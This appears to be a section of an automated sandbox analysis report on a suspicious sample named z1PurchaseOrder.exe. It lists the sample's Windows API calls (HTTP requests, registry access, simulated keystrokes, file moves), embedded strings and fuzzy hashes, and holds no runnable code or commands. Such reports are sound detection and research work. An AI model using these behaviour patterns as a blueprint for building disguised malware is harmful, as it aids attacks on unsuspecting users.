                                        • Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                        • Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: __wcsicoll
                                        • String ID: 0%d$DOWN$OFF
                                        • API String ID: 3832890014-468733193
                                        • Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                        • Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
                                        • Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                        • Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B
                                        APIs
                                        • VariantInit.OLEAUT32(00000000), ref: 0045E959
                                        • VariantCopy.OLEAUT32(00000000), ref: 0045E963
                                        • VariantClear.OLEAUT32 ref: 0045E970
                                        • VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
                                        • __swprintf.LIBCMT ref: 0045EB1F
                                        • VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
                                        • VariantInit.OLEAUT32(00000000), ref: 0045EBE7
                                        Strings
                                        • %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
                                        • String ID: %4d%02d%02d%02d%02d%02d
                                        • API String ID: 43541914-1568723262
                                        • Opcode ID: 59f20d5c687eca5b8ac21bf224ed8e62dc0999386ac77495242af5446a13f09a
                                        • Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
                                        • Opcode Fuzzy Hash: 59f20d5c687eca5b8ac21bf224ed8e62dc0999386ac77495242af5446a13f09a
                                        • Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
                                        APIs
                                        • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FE66
                                        • Sleep.KERNEL32(0000000A), ref: 0042FE6E
                                        • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FF5D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: DecrementInterlocked$Sleep
                                        • String ID: 0vH$0vH$4RH0vH$@COM_EVENTOBJ
                                        • API String ID: 2250217261-3412429629
                                        • Opcode ID: 7d20af892ce27232a3ff337619be48fed7d74e1bde2de334c7b49ab88d15dd8c
                                        • Instruction ID: 990b5f35a06538e4ae7b6c94f393f4a5fafaaf51bfa382c75dcb300f2d234fa3
                                        • Opcode Fuzzy Hash: 7d20af892ce27232a3ff337619be48fed7d74e1bde2de334c7b49ab88d15dd8c
                                        • Instruction Fuzzy Hash: E0B1C0715083009FC714EF54C990A5FB3E4AF98304F508A2FF495972A2DB78ED4ACB9A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                        • API String ID: 0-1603158881
                                        • Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                        • Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
                                        • Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                        • Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
                                        APIs
                                        • _memset.LIBCMT ref: 00479D1F
                                        • VariantInit.OLEAUT32(?), ref: 00479F06
                                        • VariantClear.OLEAUT32(?), ref: 00479F11
                                        • VariantInit.OLEAUT32(?), ref: 00479DF7
                                          • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
                                          • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
                                          • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
                                        • VariantClear.OLEAUT32(?), ref: 00479F9C
                                          • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Variant$Copy$ClearInit$ErrorLast_memset
                                        • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                        • API String ID: 665237470-60002521
                                        • Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                        • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                                        • Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                        • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
                                        APIs
                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ConnectRegistry_wcslen
                                        • String ID: HH
                                        • API String ID: 535477410-2761332787
                                        • Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                        • Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
                                        • Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                        • Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
                                        APIs
                                        • _memset.LIBCMT ref: 0045F317
                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
                                        • IsMenu.USER32(?), ref: 0045F380
                                        • CreatePopupMenu.USER32 ref: 0045F3C5
                                        • GetMenuItemCount.USER32(?), ref: 0045F42F
                                        • InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                        • String ID: 0$2
                                        • API String ID: 3311875123-3793063076
                                        • Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                        • Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
                                        • Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                        • Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\z1PurchaseOrder.exe), ref: 0043719E
                                        • LoadStringW.USER32(00000000), ref: 004371A7
                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
                                        • LoadStringW.USER32(00000000), ref: 004371C0
                                        • _printf.LIBCMT ref: 004371EC
                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208
                                        Strings
                                        • %s (%d) : ==> %s: %s %s, xrefs: 004371E7
                                        • C:\Users\user\Desktop\z1PurchaseOrder.exe, xrefs: 00437189
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString$Message_printf
                                        • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\z1PurchaseOrder.exe
                                        • API String ID: 220974073-4264958091
                                        • Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                        • Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
                                        • Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                        • Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                        • Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
                                        • Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                        • Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
                                        APIs
                                          • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\z1PurchaseOrder.exe,?,C:\Users\user\Desktop\z1PurchaseOrder.exe,004A8E80,C:\Users\user\Desktop\z1PurchaseOrder.exe,0040F3D2), ref: 0040FFCA
                                          • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                        • lstrcmpiW.KERNEL32(?,?), ref: 0045355E
                                        • MoveFileW.KERNEL32(?,?), ref: 0045358E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                        • String ID:
                                        • API String ID: 978794511-0
                                        • Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                        • Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
                                        • Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                        • Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                        • Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
                                        • Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                        • Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
                                        APIs
                                          • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
                                          • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
                                          • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
                                        • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
                                        • Sleep.KERNEL32(00000000), ref: 00445D70
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
                                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                        • String ID:
                                        • API String ID: 2014098862-0
                                        • Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                        • Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
                                        • Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                        • Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: AddressProc_malloc$_strcat_strlen
                                        • String ID: AU3_FreeVar
                                        • API String ID: 2184576858-771828931
                                        • Opcode ID: 10d9e78008ba5b5703de8dc23ed72c3cd296113dc033390a1be7ca980e1f1503
                                        • Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
                                        • Opcode Fuzzy Hash: 10d9e78008ba5b5703de8dc23ed72c3cd296113dc033390a1be7ca980e1f1503
                                        • Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
                                        APIs
                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
                                        • DestroyWindow.USER32(?), ref: 0042A751
                                        • UnregisterHotKey.USER32(?), ref: 0042A778
                                        • FreeLibrary.KERNEL32(?), ref: 0042A822
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                        • String ID: close all
                                        • API String ID: 4174999648-3243417748
                                        • Opcode ID: 9f9deb73285226e6ba240568d142da5fec9cf520cd27fc9a3a2cacaca98377aa
                                        • Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
                                        • Opcode Fuzzy Hash: 9f9deb73285226e6ba240568d142da5fec9cf520cd27fc9a3a2cacaca98377aa
                                        • Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
                                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
                                        • InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
                                          • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                        • String ID:
                                        • API String ID: 1291720006-3916222277
                                        • Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                        • Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
                                        • Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                        • Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ErrorLastselect
                                        • String ID: HH
                                        • API String ID: 215497628-2761332787
                                        • Opcode ID: 0de0448ade90d459e176b7eabd0eb7793c39b194d41e4bdd7ff4fb8690f4e17f
                                        • Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
                                        • Opcode Fuzzy Hash: 0de0448ade90d459e176b7eabd0eb7793c39b194d41e4bdd7ff4fb8690f4e17f
                                        • Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: __snwprintf__wcsicoll_wcscpy
